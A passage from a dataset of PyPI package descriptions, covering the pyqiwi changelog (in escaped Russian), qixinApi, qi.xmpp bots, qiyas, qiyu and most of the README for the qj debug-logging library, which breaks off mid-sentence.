payment.sum)print(example)\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043c\u0438\u0441\u0441\u0438\u044e \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0435\u0436\u0430~~~~~~~~~~~~~~~~~~~~~~~~~~~~~commission = wallet.commission(pid=99, recipient='79001234567', amount=1.11)print(commission.qw_commission.amount)\u0414\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439, \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e.=================\u0418\u0441\u0442\u043e\u0440\u0438\u044f \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439=================2.1 (6.05.2018)---------------* `Wallet.balance` \u0442\u0435\u043f\u0435\u0440\u044c \u0438\u043c\u0435\u0435\u0442 \u0431\u0430\u0437\u043e\u0432\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 `currency` 643 (\u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 \u0440\u0443\u0431\u043b\u044c)* \u041d\u043e\u0432\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u043e\u0432: `Wallet.identification`* \u0412\u0435\u0441\u044c \u0431\u043b\u043e\u043a \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u043a \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 \u0431\u044b\u043b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d \u0434\u043e API v2* \u0414\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u0432\u0438\u0442\u0430\u043d\u0446\u0438\u0438 \u043f\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u0443 \u0431\u044b\u043b \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d \u043c\u0435\u0442\u043e\u0434 `Wallet.cheque`* \u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u043f\u043e \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u043d\u0435\u0442 \"\u0431\u0430\u043b\u0430\u043d\u0441\u043e\u0432\" \u043d\u0430 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0435, \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0438\u0445 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 `Wallet.create_account`\u0417\u0430\u043f\u0440\u043e\u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0447\u0435\u0442\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d \u0432 `Wallet.offered_accounts`* \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u044b\u0445 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u044b\u0445 \u0444\u043e\u0440\u043c \u0434\u043e\u0441\u0442\u0443\u043d\u043e \u0432 `pyqiwi.generate_form_link`* \u0412\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c ID \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0434\u043b\u044f \u043f\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430? \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 `pyqiwi.detect_mobile`2.0.8 (29.04.2018)------------------* \u0423 \u043d\u0430\u0441 \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u0442\u0435\u0441\u0442\u044b!* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.7 (14.04.2018)------------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.6 (9.03.2018)-----------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.5 (6.11.2017)-----------------* \u041b\u043e\u0433\u0433\u0435\u0440 \u0431\u044b\u043b \u043f\u0435\u0440\u0435\u043d\u0435\u0441\u0435\u043d \u0438\u0437 `pyqiwi.logger` \u0432 `pyqiwi.apihelper.logger`* \u041f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043c\u0435\u0442\u043e\u0434 \u0432 `Wallet` `transaction` \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u043f\u043e ID \u0438 \u0435\u0451 \u0442\u0438\u043f\u0443.* \u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u044d\u0442\u0438\u043c \u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0434\u043b\u044f \u043d\u0435\u0433\u043e \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0442\u0438\u043f: `pyqiwi.types.Transaction`* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.4 (6.11.2017)-----------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.3 (6.11.2017)-----------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.2 (29.10.2017)------------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f2.0.1 (29.10.2017)------------------* \u0423 \u043d\u0430\u0441 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u043d\u0430 ReadTheDocs!* \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0432 \u043a\u043e\u0434\u0435 \u0431\u044b\u043b\u0430 \u0448\u0438\u0440\u043e\u043a\u043e \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0430* \u0411\u044b\u043b\u0438 \u0432\u043d\u0435\u0441\u0435\u043d\u044b \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u0432\u0438\u0434 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u0432 \u043a\u043e\u0434\u04352.0 (28.10.2017)----------------\u041f\u0435\u0440\u0432\u043e\u0435 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438!* \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b \u043b\u043e\u0433\u0438? \u0423 \u043d\u0430\u0441 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043b\u043e\u0433\u0433\u0435\u0440 `pyqiwi` \u0432 `pyqiwi.logger`* \u0425\u043e\u0442\u0438\u0442\u0435 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0441\u0447\u0435\u0442\u0430 \u0432 Qiwi? `Wallet.accounts`* \u0422\u0435\u043f\u0435\u0440\u044c \u0432\u044b\u0434\u0430\u0435\u0442\u0441\u044f \u043d\u0435 `dict`-\u043e\u0431\u044c\u0435\u043a\u0442\u044b, \u0430 \u0447\u0442\u043e-\u043b\u0438\u0431\u043e \u0438\u0437 `pyqiwi/types.py`* \u0412\u0441\u0435 \u0432\u044b\u0437\u043e\u0432\u044b \u043a API \u0431\u044b\u043b\u0438 \u043f\u0435\u0440\u0435\u043d\u0435\u0441\u0435\u043d\u044b \u0432 `pyqiwi/apihelper.py`* \u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u043a API, \u0432\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0438\u0437 `pyqiwi/exceptions.py`1.2.1 (24.10.2017)------------------* \u0420\u0435\u043b\u0438\u0437 \u043d\u0430 PyPI.1.2 (24.10.2017)----------------* \u041f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043b\u0430\u0441\u0441\u0430 `Person` \u0432 `Wallet`* \u041c\u0435\u0442\u043e\u0434\u044b \u043a\u043b\u0430\u0441\u0441\u0430 `Payment` \u0442\u0435\u043f\u0435\u0440\u044c \u0432 `Wallet`* \u041a\u043b\u0430\u0441\u0441 `Payment` \u0443\u0434\u0430\u043b\u0435\u043d* \u041d\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 config'\u0435, \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0443\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0434\u0430\u0442\u044c \u0442\u043e\u043a\u0435\u043d \u0432 `Wallet()` [\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0438-\u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430]* \u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u044d\u0442\u0438\u043c, \u043d\u0443\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0442\u044c \u0442\u043e\u043a\u0435\u043d \u0432 `get_commission` (\u043d\u043e \u044d\u0442\u0430 \u0436\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 `Wallet` c \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u0442\u043e\u043a\u0435\u043d\u043e\u043c)* \u041c\u0435\u0442\u043e\u0434\u044b `Wallet.history()` \u0438 `Wallet.stat()` \u0442\u0440\u0435\u0431\u0443\u044e\u0442 `datetime.datetime`, \u0432\u043c\u0435\u0441\u0442\u043e `str`* \u041b\u044e\u0431\u044b\u0435 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043a f-\u0441\u0442\u0440\u043e\u043a\u0430\u043c, \u0431\u044b\u043b\u0438 \u0437\u0430\u043c\u0435\u043d\u0435\u043d\u044b \u043d\u0430 \u043c\u0435\u0442\u043e\u0434 `str.format`1.1 (5.09.2017)---------------* \u041d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0435 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u0438\u044f1.0 (5.09.2017)---------------* \u041f\u0435\u0440\u0432\u044b\u0439 \u0440\u0435\u043b\u0438\u0437!"} +{"package": "qiwipyapi", "pacakge-description": "No description available on PyPI."} +{"package": "qixinApi", "pacakge-description": "\u9f50\u6b23\u4e91\u670d API\u64cd\u4f5c\u65b9\u6cd5\u8d26\u6237\u5217\u8868\u67e5\u8be2.get_partner_info_list()\u8ba2\u5355\u8be6\u60c5.get_order(insure_num)\u6295\u4fdd\u5355\u5217\u8868.list_order()\u67e5\u8be2\u6628\u65e5\u6295\u4fdd\u5355.list_yesterday_order()fromqixinApi.qixinApiimportQxSdkpId=''sKey=''client=QxSdk(partner_id=pId,secret_key=sKey)# client = QxSdk(partner_id=pId, secret_key=sKey, env_type='test')try:foriteminclient.list_order(page_index=1,page_size=1)['orders']['data']:detail=client.get_order(item['insureNum'])print(detail['orderDetail']['applicant']['cName'])print(detail['orderDetail']['productName'])finally:client.close()"} +{"package": "qixingjiang", "pacakge-description": "No description available on PyPI."} +{"package": "qi.xmpp.admin", "pacakge-description": "Introductionqi.xmpp.admin is a special administrative bot used by qi.xmpp.botfarm that can add/delete/list users in your jabber server by implementing the XEP-0133 protocol.Changelog0.1 - UnreleasedInitial release"} +{"package": "qi.xmpp.botfarm", "pacakge-description": "Introduction============qi.xmpp.botfarm is a twisted based server that provides xmlrpc services to manage a collection of jabber-based helpdesks. It is currently used at chatblox.com_... _chatblox.com: http://chatblox.comInstallation============Installing with buildout------------------------If you are using `buildout`_ to manage your instance installing qi.xmpp.botfarm is very simple. You can install it by adding a new section, botfarm and include it in the parts section::[botfarm]recipe = zc.recipe.eggeggs = qi.xmpp.botfarmqi.xmpp.clientqi.xmpp.adminA link will be created in the bin directory pointing to the botfarm executable... _buildout: http://pypi.python.org/pypi/zc.buildoutInstalling without buildout---------------------------You can install qi.xmpp.botfarm easily using the easy_install command from setuptools. This will also install dependencies.Usage=====botfarm is called with the path to an xml configuration file as an argument. Copy config.xml in the docs folder and customize to your needs.Changelog=========0.1 - Unreleased----------------* Initial release"} +{"package": "qi.xmpp.client", "pacakge-description": "Introductionqi.xmpp.client is a simple xmpp (jabber) bot written on the twisted framework. By itself it does almost nothing but provides a good base on which to create your own bot by simply overriding the functions you want to support. The following xmpp extensions are supported:XEP-0030, Service discoveryXEP 0153 and XEP-0054, VCardsXEP-0095 and XEP-0065, file transfers through SOCKS5XEP-0092, Software versionXEP-0199, PingsChangelog0.1 - UnreleasedInitial release"} +{"package": "qixnat", "pacakge-description": "qixnat provides a XNAT facade and helper functions. See thedocumentationfor more information."} +{"package": "qiyas", "pacakge-description": "qiasqias is lightweight easy-to-use non-opinionated unit conversion Python library for scientists and engineers. It is based on graph theory and allows easy customization and addition of new units via script. Each unit need to be only defined by one existing unit. qias is smart enough to figure out the rest.Important noteThis is a very early release to proove the concept. Everything is working as expected and there are no issues. conversion tables need to be added. Currently, there are some units for length, mass, and volume for testing.PhilosophyLightweight: it only relies on thenetworkxpackage to handle graph operations andvarnameto identify variable names.Easy-to-use: customize it easily with new units.non-opinionated: It does not assume anything about your data. It does not create new data type. You can pass numpy array (or datatype that can be multiplied by a number) to it without issue.InstallationInstall it in your environment by running the commandpip install qiyasGetting startedfromqiyasimportqs# Typical usex=10x_cm=qs.convert(x,'m','cm')# Immediate use (Python 3.8+)x_m=10x_cm=qs.to(x_m,'cm')# Get multiplier informationmultiplier_info=qs.get_multiplier('m','cm')ContributionContributions are welcome, especially for unit tables. Create an issue first to discuss architectural change.MIT LicenseCopyright (c) 2021 Mustafa Al IbrahimPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qiye-game1", "pacakge-description": "No description available on PyPI."} +{"package": "qiye-weixin-api", "pacakge-description": "No description available on PyPI."} +{"package": "qiyi-utils", "pacakge-description": "UNKNOWN"} +{"package": "qiyu-api", "pacakge-description": "QiYu-API\u5947\u9047\u79d1\u6280 Python API \u96c6\u5408\u5f53\u524d\u5df2\u7ecf\u5408\u5e76ali_sms_api (\u963f\u91cc\u4e91\u77ed\u4fe1)apns_sdk_py (Apple APNs \u63a8\u9001)dtk_api (\u5927\u6dd8\u5ba2\u63a5\u53e3)mob_api (\u638c\u6dd8\u79d1\u6280\u63a5\u53e3)py_apple_signin (Apple Sign in \u63a5\u53e3)tbk_api (\u6dd8\u5b9d\u5ba2\u6807\u51c6\u5316\u7684\u7c7b\u578b)ztk_api (\u6298\u6dd8\u5ba2\u63a5\u53e3)"} +{"package": "qiyu-sso", "pacakge-description": "QiYu SSO Client\u63d0\u793a\u5f53\u524d\u4ec5\u4ec5\u662f\u5185\u90e8\u4f7f\u7528\u5b98\u7f51:https://user.qiyutech.tech/"} +{"package": "qj", "pacakge-description": "qjlogging designed for debugging(pronounced \u2018queuedj\u2019 /kju\u02d0\u02a4/)An easy-to-use but very expressive logging function.If you have ever found yourself rewriting a list comprehension as a for loop, or\nsplitting a line of code into three lines just to store and log an intermediate\nvalue, then this log function is for you.Overview:qj is meant to help debug python quickly with lightweight log messages that are\neasy to add and remove.On top of the basic logging functionality, qj also provides a collection of\ndebugging helpers that are simple to use, including the ability to drop into\nthe python debugger in the middle of a line of code.Examples:Instead of turning this:result = some_function(another_function(my_value))into this:tmp = another_function(my_value)\nlogging.info('tmp = %r', tmp)\nresult = some_function(tmp)you can just do this:result = some_function(qj(another_function(my_value)))Instead of turning this:my_list = [process_value(value)\n for value in some_function(various, other, args)\n if some_condition(value)]into this:my_list = []\nfor value in some_function(various, other, args):\n logging.info('value = %r', value)\n condition = some_condition(value)\n logging.info('condition = %r', condition)\n if condition:\n final_value = process_value(value)\n logging.info('final_value = %r', final_value)\n my_list.append(final_value)\nlogging.info('my_list = %r', my_list)you can keep it as the list comprehension:my_list = qj([qj(process_value(qj(value)))\n for value in some_function(various, other, args)\n if qj(some_condition(value))])Philosophy:There are two reasons we add logs to our code:We want to communicate something to the user of the code.We want to debug.In python, as well as most other languages, the default logging mechanisms\nserve the first purpose well, but make things unnecessarily difficult for the\nsecond purpose.Debug logging should have no friction.When you have of a question about your code, you should not be tempted to just\nthink hard to try to come up with the answer. Instead, you should know that\nyou can type just a few characters to see the answer.You should never have to rewrite code just to check it for bugs.The most important feature of a debug logger is that it always returns its\nargument. This allows you to add logging calls pretty much anywhere in your\ncode without having to rewrite your code or create temporary variables.This is a minimal implementation of qj:def qj(x):\n print(x)\n return xOnce you have that core property, there are a lot of other useful things you find\nyourself wanting that make debugging easier. qj attempts to cleanly pull\ndebugging-related features together into a very simple power-user interface.\nTo that end, most argument names are single letters that are mnemonics for the\nparticular feature:xis for the input that you want to log and return.sis for the string you want to describex.dis for the debugger.bis for the boolean that turns everything off.lis for the lambda that lets you log more things.pis for printing public properties ofx.nis for numpy array statistics.tis for printing tensorflow Tensors.ris for overriding the return value.zis for zeroing out the log count and automatic indentation of a particular log.A few less-commonly needed features get longer names:padis for padding a log message so that it stands out.tfcis for checking numerics on tensorflow Tensors.ticandtocare for measuring and logging timing of arbitrary chunks of code.timeis for measuring and logging timing stats for a callable.catchis for catching exceptions from a callable.log_all_callsis for wrappingxsuch that all public method calls and\ntheir return values get logged.The right description ofxis usually its source code.If you want to log the value of a variable namedlong_variable_name, you shouldn't\nneed to think about how to describe the variable in the log message so you can find it.\nIts name and the line number where you are logging it are its best description.qj(long_variable_name)logs something like this:qj: some_func: long_variable_name : Similarly, logging the value of a complicated expression should use the expression\nitself as the description.qj(foo * 2 + bar ** 2)logs something like:qj: some_func: foo * 2 + bar ** 2 : 42Note that this feature may not always work. If qj can't figure out the correct source code,\nit falls back to just logging the class (e.g.,qj: some_func: : 42).\nYou can always disable this just by passing the second argument to qj:qj(foo * 2 + bar ** 2, 'foo out').You shouldn't need toimportjust to log debug messages.Ideally, something like qj would be available as a builtin in python. We can get pretty\nclose to that ideal by providing a way to install qj into the global namespace after\nimporting it the first time. This means that you can pretend qj is a builtin and use it\nin any python code that runs after you import it once, even if the original import is in\nsome other file, package, or library.Adding logs should be easy. So should removing logs.The name qj is meant to be easy to type (two characters in opposite hands) and\neasy to search for and highlight in your code. 'qj' is one of the least\nfrequently occurring bigrams based on a survey of millions of lines of python\ncode, so it is hopefully very unlikely to occur naturally in your code. This\nproperty will help you find and remove all of your debug logs easily once you\nhave fixed your bugs.Logs should be easy to read.qj defaults to using colors. The metadata and description of the log are in red.\nThe value of the log is in green. Your debug logs will stand out strongly against\nwhatever normal logging your code does.qj also works to align log messages nicely, where possible, to help you visually\ngroup related log messages together.Basic Usage:Install with pip:$ pip install qjAdd the following import:from qj_global import qjThis makes qj globally available in any python code that is run after the\nimport. It's often nice to import qj from your main script once, since you\ncan then use it in your entire project (and even in other python libraries).\nSeeGlobal Accessfor more information on importing.If your problem code looks like this:def problem_code(...):\n ...\n problem_array = [other_func(value, other_args)\n for value in compute_some_array(more_args)\n if some_tricky_condition]Make it look like this:def problem_code(...):\n ...\n problem_array = qj([qj(other_func(qj(value), qj(other_args)))\n for value in qj(compute_some_array(qj(more_args)))\n if qj(some_tricky_condition)])In most cases, you shouldn't need to put logs on everything like that, of\ncourse. If your debug cycle is fast, you can add the logs more selectively to\navoid getting overwhelmed by new logspam.These changes will result in detailed logs that tell you what function they\nare running in, what line number they are on, what source code for the log is,\nand what its value is.The log messages will also be indented some amount that corresponds to how\nmany calls to qj are in the current code context. This is particularly\nuseful with comprehensions, since python reports the last line of the\ncomprehension in logs and stack traces, which is often not the correct line\nwhen dealing with long comprehensions (or even long argument lists).This is the general layout of the basic log message:[datetime] qj: function: [indentation] source code or description : valueIn the example above, the log messages might look like:qj: problem_code: more_args <92>: ['list', 'of', 'more_args']\nqj: problem_code: compute_some_array(qj(more_args)) <92>: ['list', 'of', 'things', 'hey!']\nqj: problem_code: some_tricky_condition <92>: True\nqj: problem_code: other_args <92>: ['list', 'of', 'other_args']\nqj: problem_code: value <92>: list\nqj: problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return list\nqj: problem_code: some_tricky_condition <92>: True\nqj: problem_code: other_args <92>: ['list', 'of', 'other_args']\nqj: problem_code: value <92>: of\nqj: problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return of\nqj: problem_code: some_tricky_condition <92>: False\nqj: problem_code: some_tricky_condition <92>: True\nqj: problem_code: other_args <92>: ['list', 'of', 'other_args']\nqj: problem_code: value <92>: hey!\nqj: problem_code: other_func(qj(value), qj(other_args)) <92>: other_func_return hey!\nqj: problem_code: [qj(other_func(qj(value), qj(other_args))) ...] <92>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!']Things to note in that output:The indentation automatically gives a visual indicator of how the\ncomprehension is being computed -- you can see how the loops happen and\nwhen an iteration gets skipped at a glance or so (e.g., the two lines with\nthe same indention should jump out, and closer inspection shows that the\nif statement generated the False, which explains why the\nprevious indentation pattern didn't repeat).You didn't have to specify any logging strings -- qj extracted the source code from the call site.You can change the description string withqj(foo, 'this particular foo'):qj: some_func: this particular foo <149>: fooIf qj can't find the correct source code, it will log the type of the output instead.\nIf that happens, or if you don't want to see the line of code, you might change the\nprevious logging to look like this:def problem_code(...):\n ...\n problem_array = qj([qj(other_func(qj(value), qj(other_args)), 'other_func return')\n for value in qj(s='computed array', x=compute_some_array(qj(more_args)))\n if qj(s='if', x=some_tricky_condition)], 'problem_array')\n\nqj: problem_code: more_args <153>: ['list', 'of', 'more_args']\nqj: problem_code: computed array <153>: ['list', 'of', 'things', 'hey!']\nqj: problem_code: if <153>: True\nqj: problem_code: other_args <153>: ['list', 'of', 'other_args']\nqj: problem_code: value <153>: list\nqj: problem_code: other_func return <153>: other_func_return list\nqj: problem_code: if <153>: True\nqj: problem_code: other_args <153>: ['list', 'of', 'other_args']\nqj: problem_code: value <153>: of\nqj: problem_code: other_func return <153>: other_func_return of\nqj: problem_code: if <153>: False\nqj: problem_code: if <153>: True\nqj: problem_code: other_args <153>: ['list', 'of', 'other_args']\nqj: problem_code: value <153>: hey!\nqj: problem_code: other_func return <153>: other_func_return hey!\nqj: problem_code: problem_array <153>: ['other_func_return list', 'other_func_return of', 'other_func_return hey!']Note that both positional argumentsqj(value, 'val')and keyword argumentsqj(s='val', x=value)can be used.Advanced Usage:These are ordered by the likelihood that you will want to use them.You can enter the debugger withqj(d=1):This drops you into the debugger -- it even works in jupyter notebooks!You can use this to drop into the debugger in the middle of executing a comprehension:[qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']]\n\nqj: some_func: d=(value=='foo'), x=value <198>: foo\n> (198)some_func()\n----> 198 [qj(d=(value=='foo'), x=value) for value in ['foo', 'bar']]\n\nipdb> value\n'foo'You can selectively turn logging off withqj(foo, b=0):This can be useful if you only care about logging when a particular value shows up:[qj(b=('f' in value), x=value) for value in ['foo', 'bar']]\n\nqj: some_func: b=('f' in value), x=value <208>: fooNote the lack of a log for 'bar'.If logging is disabled for any reason, the other argument-based features will not trigger either:qj(foo, d=1, b=(foo == 'foo'))This will only drop into the debugger iffoo == 'foo'.Logging can be disabled for three reasons:b=False, as described above.qj.LOG = False(seeParametersbelow).You are attempting to print more thanqj.MAX_FRAME_LOGSin the current\nstack frame (seeParametersbelow).You can log extra context withqj(foo, l=lambda _: other_vars):This is useful for logging other variables in the same context:[qj(foo, l=lambda _: other_comp_var) for foo, other_comp_var in ...]\n\nqj: some_func: foo, l=lambda _: other_comp_var <328>: foo\nqj: some_func: ['other', 'comprehension', 'var']\nqj: some_func: foo, l=lambda _: other_comp_var <328>: bar\nqj: some_func: ['other', 'comprehension', 'var']The input (x) is passed as the argument to the lambda:qj(foo, l=lambda x: x.replace('f', 'z'))\n\nqj: some_func: foo, l=lambda x: x.replace('f', 'z') <336>: foo\nqj: some_func: zooNote that qj attempts to nicely align the starts of log messages that are all generated from the same call to qj.You can log the timing of arbitrary code chunks withqj(tic=1) ... qj(toc=1):qj(tic=1)\ndo_a_bunch()\nof_things()\nqj(toc=1)\n\nqj: some_func: tic=1 <347>: Adding tic.\nqj: some_func: toc=1 <350>: Computing toc.\nqj: 2.3101 seconds since tic=1.You can nestticandtoc:qj(tic=1)\ndo_something()\nqj(tic=2)\ndo_something_else()\nqj(toc=1)\nfinish_up()\nqj(toc=1)\n\nqj: some_func: tic=1 <348>: Adding tic.\nqj: some_func: tic=2 <350>: Adding tic.\nqj: some_func: toc=1 <352>: Computing toc.\nqj: 0.5200 seconds since tic=2.\nqj: some_func: toc=1 <354>: Computing toc.\nqj: 1.3830 seconds since tic=1.Since anyTruevalue will turn ontic, you can use it as a convenient identifier, as above wheretic=2is the second tic. The actual identifier printed bytocis whatever description string was\nused for thetic, though, so you can give descriptive names just as in any other log message:qj(foo, 'start foo', tic=1)\nfoo.start()\nqj(foo.finish(), toc=1)\n\nqj: some_func: start foo <367>: \nqj: Added tic.\nqj: some_func: foo.finish(), toc=1 <369>: Foo.SUCCESSFUL_FINISH\nqj: 5.9294 seconds since start foo.You can useticandtocin the same call to log the duration of any looping code:[qj(x, tic=1, toc=1) for x in [1, 2, 3]]\n\nqj: some_func: x, tic=1, toc=1 <380>: 1\nqj: Added tic.\nqj: some_func: x, tic=1, toc=1 <380>: 2\nqj: 0.0028 seconds since x, tic=1, toc=1.\nqj: Added tic.\nqj: some_func: x, tic=1, toc=1 <380>: 3\nqj: 0.0028 seconds since x, tic=1, toc=1.\nqj: Added tic.You can usetoc=-1to clear out all previoustics:qj(tic=1)\ndo_something()\nqj(tic=2)\ndo_something_else()\nqj(tic=3)\nfinish_up()\nqj(toc=-1)\n\nqj: some_func: tic=1 <394>: Adding tic.\nqj: some_func: tic=2 <396>: Adding tic.\nqj: some_func: tic=3 <398>: Adding tic.\nqj: some_func: toc=1 <400>: Computing toc.\nqj: 0.2185 seconds since tic=3.\nqj: 0.5200 seconds since tic=2.\nqj: 1.3830 seconds since tic=1.You can log the public properties for the input withqj(foo, p=1):qj(some_object, p=1)\n\nqj: some_func: some_object, p=1: some_object.__str__() output\nqj: Public properties:\n some_method(a, b=None, c='default')\n some_public_propertyNote that this can be dangerous. In order to log the method signatures,\nPython'sinspectmodule can actually cause code to execute on your object.\nSpecifically, if you have@propertygetters on your object, that 